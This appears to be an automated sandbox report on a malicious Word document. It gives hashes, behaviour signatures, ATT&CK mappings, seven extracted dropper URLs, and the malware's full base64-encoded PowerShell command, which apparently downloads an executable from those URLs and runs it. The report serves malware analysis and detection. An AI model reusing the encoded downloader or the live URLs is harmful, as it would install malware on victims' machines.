cdbbf8c834f089d9e2fc8ef834f7495eba2af2b781871327559d931b7e83c0dd

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
25/09/2024, 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f67aa05b9fc33a12c4f1e7e8141ad365_JaffaCakes118.doc
Size

198KB
MD5

f67aa05b9fc33a12c4f1e7e8141ad365
SHA1

02e8f0c433eb79f69dbfaa90366491cf04b72bd3
SHA256

cdbbf8c834f089d9e2fc8ef834f7495eba2af2b781871327559d931b7e83c0dd
SHA512

329b64367b4871ef8924c0a1f561c3e706ab6e1b7d3c1c0c17143366783ef6d40ad7d5b64138199e9d51d5c7709c03f935ecdbc5b3332688044c67a1693c612b
SSDEEP

3072:9WKWj22TWTogk079THcpOu5UZI5EcbWD+Wzr:y/TX07hHcJQ+EcKDBzr

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://haymetetrading.com/wp-includes/yGELKj4/

exe.dropper

http://simofferbd24.com/wp-includes/fsiQc/

exe.dropper

http://401kplansinfo.com/cgi-bin/KtFRk/

exe.dropper

http://fidelityguide.com/cgi-bin/VA/

exe.dropper

https://sirnakmidyeci.com/wp-includes/qk9wW2/

exe.dropper

https://subitocarne.com/wp-content/ByeOAt9/

exe.dropper

https://eliesalibaarchitect.com/wordpress/T/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	2704	powershell.exe	30

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2848	powershell.exe
12	2848	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{37131AB1-67B3-4A41-8CF9-41E6D8336063}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37131AB1-67B3-4A41-8CF9-41E6D8336063}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37131AB1-67B3-4A41-8CF9-41E6D8336063}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2552	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2848	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2552	WINWORD.EXE
2552	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2552 wrote to memory of 2880	2552	WINWORD.EXE	35
PID 2552 wrote to memory of 2880	2552	WINWORD.EXE	35
PID 2552 wrote to memory of 2880	2552	WINWORD.EXE	35
PID 2552 wrote to memory of 2880	2552	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f67aa05b9fc33a12c4f1e7e8141ad365_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABVAGUAdgB3AHoAZwB6AD0AKAAoACcAQgAnACsAJwBrAG4AdAAnACkAKwAoACcANAA1ACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AVgA6AHUAcwBFAHIAcAByAE8ARgBpAGwAZQBcAHkAdgAzAFcAbQA5AGcAXAB3AFoATgA3ADgAZQA4AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAGUAQwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAcgBJAGAAVABZAFAAYABSAE8AdABPAEMAYABvAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAdAAnACsAKAAnAGwAJwArACcAcwAxADEALAAgAHQAJwApACsAJwBsACcAKwAnAHMAJwApADsAJABRADMAeQB3AGkAbwBvACAAPQAgACgAKAAnAFQAJwArACcAaQBpACcAKQArACgAJwAwACcAKwAnAGIAYwAnACkAKwAnAHAAJwApADsAJABFAGYAZQA1AHEAegA5AD0AKAAnAFcAJwArACgAJwB6ACcAKwAnADUAZAA0ACcAKQArACcANABlACcAKQA7ACQAQgBuAHAAXwBzADUAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAGcAJwArACcAUQBXAFkAJwArACcAdgAzACcAKQArACcAdwAnACsAJwBtACcAKwAnADkAZwAnACsAKAAnAGcAUQAnACsAJwBXACcAKQArACgAJwBXAHoAJwArACcAbgA3ACcAKQArACcAOABlACcAKwAoACcAOABnAFEAJwArACcAVwAnACkAKQAuACIAcgBlAHAAYABsAGAAQQBjAGUAIgAoACgAWwBDAGgAQQByAF0AMQAwADMAKwBbAEMAaABBAHIAXQA4ADEAKwBbAEMAaABBAHIAXQA4ADcAKQAsAFsAcwBUAFIASQBOAEcAXQBbAEMAaABBAHIAXQA5ADIAKQApACsAJABRADMAeQB3AGkAbwBvACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAWABzAHQAYgB1AHgAcgA9ACgAKAAnAEcAZAAnACsAJwBlACcAKQArACgAJwB5ADcAMAAnACsAJwA5ACcAKQApADsAJABUAHIANwB5ADAAZQBnAD0AJgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAHgAZQBhAGsAcgBxAD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBoAGEAeQAnACsAJwBtAGUAdABlAHQAcgAnACsAJwBhAGQAaQBuAGcALgAnACkAKwAoACcAYwBvAG0AJwArACcALwB3AHAALQBpAG4AJwArACcAYwBsAHUAJwArACcAZABlACcAKQArACgAJwBzACcAKwAnAC8AeQBHACcAKQArACcARQBMACcAKwAoACcASwBqACcAKwAnADQALwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHMAJwApACsAJwBpAG0AJwArACcAbwAnACsAJwBmAGYAJwArACgAJwBlAHIAJwArACcAYgBkACcAKQArACgAJwAyADQALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwB3ACcAKwAnAHAALQBpACcAKQArACgAJwBuAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAnAHMAJwArACgAJwAvAGYAJwArACcAcwBpAFEAYwAnACkAKwAnAC8AKgAnACsAJwBoAHQAJwArACgAJwB0AHAAOgAvACcAKwAnAC8ANAAwADEAawBwAGwAYQAnACsAJwBuACcAKwAnAHMAJwArACcAaQBuAGYAbwAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAoACcALwBjACcAKwAnAGcAaQAnACkAKwAnAC0AYgAnACsAKAAnAGkAbgAnACsAJwAvAEsAJwArACcAdABGAFIAawAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAGYAaQAnACsAJwBkAGUAbAAnACsAJwBpAHQAeQAnACkAKwAoACcAZwB1AGkAJwArACcAZABlAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAGMAJwArACcAZwBpACcAKwAnAC0AJwArACgAJwBiAGkAbgAnACsAJwAvACcAKQArACgAJwBWAEEALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAcwAnACsAJwA6AC8ALwAnACkAKwAoACcAcwAnACsAJwBpAHIAbgBhAGsAbQBpACcAKwAnAGQAeQAnACsAJwBlACcAKQArACgAJwBjAGkAJwArACcALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAnAHUAZAAnACsAKAAnAGUAJwArACcAcwAvAHEAJwApACsAJwBrACcAKwAnADkAdwAnACsAKAAnAFcAMgAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwA6ACcAKwAnAC8ALwBzAHUAYgAnACkAKwAoACcAaQB0AG8AYwBhAHIAJwArACcAbgBlACcAKQArACcALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAJwArACgAJwBwAC0AYwBvACcAKwAnAG4AdABlACcAKwAnAG4AJwApACsAKAAnAHQALwAnACsAJwBCAHkAZQBPAEEAJwArACcAdAAnACkAKwAoACcAOQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzADoAJwApACsAKAAnAC8ALwBlAGwAJwArACcAaQBlAHMAJwApACsAKAAnAGEAbAAnACsAJwBpAGIAJwApACsAKAAnAGEAYQAnACsAJwByAGMAJwApACsAKAAnAGgAaQB0ACcAKwAnAGUAJwArACcAYwB0ACcAKwAnAC4AYwBvAG0ALwB3ACcAKwAnAG8AcgBkAHAAcgBlACcAKwAnAHMAcwAnACsAJwAvAFQALwAnACkAKQAuACIAcwBgAFAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABTAHIAcAB1AGIANgA1AD0AKAAoACcASQA2AHoAJwArACcAZABfACcAKwAnAGwAJwApACsAJwByACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAZQBjAGcAdAA0AHkAIABpAG4AIAAkAEMAeABlAGEAawByAHEAKQB7AHQAcgB5AHsAJABUAHIANwB5ADAAZQBnAC4AIgBEAG8AYABXAG4AYABMAE8AQQBEAGYAaQBsAEUAIgAoACQAUQBlAGMAZwB0ADQAeQAsACAAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAcgBjAHQAdABuAHYAPQAoACgAJwBSAGMAJwArACcAdQBtACcAKQArACcAdQAnACsAJwBrAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEIAbgBwAF8AcwA1AHYAKQAuACIATABlAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADMANwA5ADcANgApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAbgBtAG4AdgAxAGIAPQAoACcARQAxACcAKwAoACcAegAwAG4AYwAnACsAJwA5ACcAKQApADsAYgByAGUAYQBrADsAJABFAHUAbwA4AG8AaABuAD0AKAAnAFcAJwArACgAJwA3AF8AbAByACcAKwAnADQAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQBtADgAMABmAHYAdAA9ACgAKAAnAEEAJwArACcANgBtACcAKQArACcAeAA3ACcAKwAnAHYAbAAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
00b87d166f65989cd40f13d082df19db

SHA1
0554736673b7d647b36f62e93c55dc89d50ed1c8

SHA256
acaa010a9ef2b5606c7ef3dfc218f631373d49202516fd2157f0610797933c6a

SHA512
a5621d0e84cfdca13ea317243173889173a467828f21ef171426fca6f238b38918b3f5ae9bd30c80c60a83c9089437cccb28f6c5c824e8de1007193ea318f5c4

Download Submit
memory/2552-25-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-11-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-5-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-6-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-7-0x0000000005F30000-0x0000000006030000-memory.dmp

Filesize
1024KB

Download
memory/2552-20-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-21-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-19-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-18-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-17-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-16-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-15-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-13-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-12-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-0-0x000000002FBE1000-0x000000002FBE2000-memory.dmp

Filesize
4KB

Download
memory/2552-10-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-9-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-8-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-2-0x000000007144D000-0x0000000071458000-memory.dmp

Filesize
44KB

Download
memory/2552-14-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-31-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-23-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-22-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-26-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-30-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-24-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-29-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-28-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-27-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-32-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-61-0x000000007144D000-0x0000000071458000-memory.dmp

Filesize
44KB

Download
memory/2552-60-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2552-40-0x000000007144D000-0x0000000071458000-memory.dmp

Filesize
44KB

Download
memory/2552-41-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-42-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-43-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-44-0x00000000007C0000-0x00000000008C0000-memory.dmp

Filesize
1024KB

Download
memory/2552-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2848-38-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2848-39-0x0000000002250000-0x0000000002258000-memory.dmp

Filesize
32KB

Download